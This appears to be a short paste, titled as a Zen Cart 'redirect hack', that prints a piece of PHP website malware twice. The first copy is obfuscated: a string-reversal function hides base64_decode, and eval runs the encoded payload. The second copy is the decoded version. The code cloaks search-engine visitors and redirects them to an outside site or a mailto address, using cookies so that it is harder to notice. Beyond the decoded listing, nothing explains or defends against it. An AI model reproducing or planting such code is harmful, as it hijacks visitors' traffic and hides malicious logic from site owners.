Custom zencart redirect hack

1. <?php
2. function reverse($str){
3. if($str == ''){
4. return null;
5. }
6. if(strlen($str) == 1){
7. return $str;
8. }else{
9. $string = "";
10. for($i=1;$i<=strlen($str);$i++){
11. $string .=substr($str,-$i,1);
12. }
13. return $string;
14. }
15. }
16. $zencart=reverse("edoced_46esab");
17. eval ($zencart('ZXJyb3JfcmVwb3J0aW5nKDcpOwokY2hlY2sgPSJzaGluZS1jaGVjayI7CiRjaGVjazIgPSJ0d290aW1lIjsKJGFkc2VuX2NvZGUgPScnOy8vsuXI67nIuOi547jmCiRDb29raWVUaW1lPTA7CmlmIChpc3NldCgkX0NPT0tJRVsiVVNFUklEIl0pIGFuZCAoICRfQ09PS0lFWyJVU0VSSUQiXT09JGNoZWNrICkgKQp7SGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy50aGVtYWdpY21vbWVudC5jby51ayIpO30KZWxzZSBpZiAoaXNzZXQoJF9DT09LSUVbIlVTRVJJRCJdKSBhbmQgKCAkX0NPT0tJRVsiVVNFUklEIl09PSRjaGVjazIpICkKewp9CmVsc2UKewokdGFyZ2V0X3VybD1hcnJheSgpOwovLyR0YXJnZXRfdXJsWzBdPSJodHRwIjsKZm9yKCRpPTA7JGk8Mzk7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Imh0dHA6Ly93d3cudGhlbWFnaWNtb21lbnQuY28udWsiOwp9CmZvcigkaT00MDskaTwxMDA7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Im1haWx0bzpoYWNrc2VvQHBvc3QuY29tIjsNCn0NCmZ1bmN0aW9uIHJhbmRfYXJyYXkoJGFycikgDQp7IA0KCSRhcnJfc2l6ZT1zaXplb2YoJGFycik7DQoJJHRtcF9hcnI9YXJyYXkoKTsgDQoJZm9yKCRpPTA7JGk8JGFycl9zaXplOyRpKyspeyANCgkJbXRfc3JhbmQoKGRvdWJsZSkgbWljcm90aW1lKCkqMTAwMDAwMCk7IA0KCQkkcmQ9bXRfcmFuZCgwLCRhcnJfc2l6ZS0xKTsgDQoJCWlmKCR0bXBfYXJyWyRyZF09PSIiKSANCgkJeyANCgkJCSR0bXBfYXJyWyRyZF09JGFyclskaV07IA0KCQl9IA0KCQllbHNlDQoJCXsgDQoJCQkkaT0kaS0xOyANCgkJfSANCgl9IA0KCXJldHVybiAkdG1wX2FycjsgDQp9DQokYXR0YWNrX3VybD1yYW5kX2FycmF5KCR0YXJnZXRfdXJsKTsNCiRhdHRhY2t1cmw9Ind3dyI7DQokbDE9JF9TRVJWRVJbIkhUVFBfQUNDRVBUX0xBTkdVQUdFIl07DQppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKXsgDQokYTEgPSAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107IA0KfSBlbHNlIHsgDQokYTEgPSAnJzsgDQp9IA0KJGwyPSJ6aCI7CiRhMj0iYmluZyI7CiRhMz0iY29tLmhrIjsKJGE1PSJnb29nbGUiOwokYTQ9InlhaG9vIjsKaWYgKCggc3RycG9zKCRsMSwkbDIpID09PSBmYWxzZSApYW5kKCAoIHN0cnBvcygkYTEsJGEzKSA9PSBmYWxzZSApKWFuZCgoIHN0cnBvcygkYTEsJGEyKSA9PSB0cnVlIClvciggc3RycG9zKCRhMSwkYTUpID09IHRydWUgKW9yKCBzdHJwb3MoJGExLCRhNCkgPT0gdHJ1ZSApKSBhbmQgKCBzdHJwb3MoJGF0dGFja191cmxbMV0sJGF0dGFja3VybCkgPT0gdHJ1ZSApKSB7CnNldGNvb2tpZSgiVVNFUklEIiwgInNoaW5lLWNoZWNrIiwgMCwiLyIsIiIpO0hlYWRlcigiTG9jYXRpb246ICRhdHRhY2tfdXJsWzFdIik7fQplbHNlCnsKc2V0Y29va2llKCJVU0VSSUQiLCAidHdvdGltZSIsIDAsIi8iLCIiKTsKfQp9'));
18. ?><?php
19.  
20.  
21. DECODED:
22.  
23. error_reporting(7);
24. $check ="shine-check";
25. $check2 ="twotime";
26. $adsen_code ='';//
27. $CookieTime=0;
28. if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check ) )
29. {Header("Location: http://www.themagicmoment.co.uk");}
30. else if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check2) )
31. {
32. }
33. else
34. {
35. $target_url=array();
36. //$target_url[0]="http";
37. for($i=0;$i<39;$i++)
38. {
39. $target_url[$i]="http://www.themagicmoment.co.uk";
40. }
41. for($i=40;$i<100;$i++)
42. {
43. $target_url[$i]="mailto:hackseo@post.com";
44. }
45. function rand_array($arr)
46. {
47. $arr_size=sizeof($arr);
48. $tmp_arr=array();
49. for($i=0;$i<$arr_size;$i++){
50. mt_srand((double) microtime()*1000000);
51. $rd=mt_rand(0,$arr_size-1);
52. if($tmp_arr[$rd]=="")
53. {
54. $tmp_arr[$rd]=$arr[$i];
55. }
56. else
57. {
58. $i=$i-1;
59. }
60. }
61. return $tmp_arr;
62. }
63. $attack_url=rand_array($target_url);
64. $attackurl="www";
65. $l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
66. if(isset($_SERVER['HTTP_REFERER'])){
67. $a1 = $_SERVER['HTTP_REFERER'];
68. } else {
69. $a1 = '';
70. }
71. $l2="zh";
72. $a2="bing";
73. $a3="com.hk";
74. $a5="google";
75. $a4="yahoo";
76. if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
77. setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
78. else
79. {
80. setcookie("USERID", "twotime", 0,"/","");
81. }
82. }